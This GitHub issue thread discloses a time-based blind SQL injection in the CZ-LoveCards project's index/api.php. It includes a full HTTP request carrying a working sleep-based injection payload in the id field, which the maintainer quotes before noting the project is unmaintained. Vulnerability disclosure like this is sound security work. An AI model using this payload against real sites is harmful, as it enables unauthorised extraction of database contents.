### ISSUE TITLE
SQL injection

### ISSUE THREAD

**Issue by C3ting** [zhiguai/CZ-LoveCards#5]
SQL injection vulnerability in index/api.php file (time blind)

![image](https://user-images.githubusercontent.com/92133551/234507705-c95a0f8f-e754-4d7c-971f-492f1711a1c2.png)

Request header information:

POST /index/api.php HTTP/1.1
Host: l.com
Content-Length: 73
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://l.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://l.com/index/writeCard.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=gdchbjp7dfeg4ujsvt036mjhkv; _pk_id.3.045e=0379e4693a710c47.1682491321.; _pk_ses.3.045e=1
Connection: close

state=zan&id=1' and if ((ascii(substr(database(),1,1))=108),sleep(3),1)# 

Trigger condition:
In /index/api.php, when state= is not used, the received id is directly used to query the database, but there is no echo information, but the blind note of the time can be used to query the database information directly.
![image](https://user-images.githubusercontent.com/92133551/234508149-5cc52e9b-97be-477e-9725-9175fe570e36.png)

**Comment by zhiguai** [comment]
> SQL injection vulnerability in index/api.php file (time blind)
> 
> ![image](https://user-images.githubusercontent.com/92133551/234507705-c95a0f8f-e754-4d7c-971f-492f1711a1c2.png)
> 
> Request header information:
> 
> POST /index/api.php HTTP/1.1
> Host: l.com
> Content-Length: 73
> Cache-Control: max-age=0
> Upgrade-Insecure-Requests: 1
> Origin: http://l.com
> Content-Type: application/x-www-form-urlencoded
> User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36
> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
> Referer: http://l.com/index/writeCard.php
> Accept-Encoding: gzip, deflate
> Accept-Language: zh-CN,zh;q=0.9
> Cookie: PHPSESSID=gdchbjp7dfeg4ujsvt036mjhkv; _pk_id.3.045e=0379e4693a710c47.1682491321.; _pk_ses.3.045e=1
> Connection: close
> 
> state=zan&id=1' and if ((ascii(substr(database(),1,1))=108),sleep(3),1)# 
> 
> Trigger condition:
> In /index/api.php, when state= is not used, the received id is directly used to query the database, but there is no echo information, but the blind note of the time can be used to query the database information directly.
> ![image](https://user-images.githubusercontent.com/92133551/234508149-5cc52e9b-97be-477e-9725-9175fe570e36.png)
> 

非常感谢，该项目暂时处于停止维护的状态，后期如有时间会修复当前漏洞。
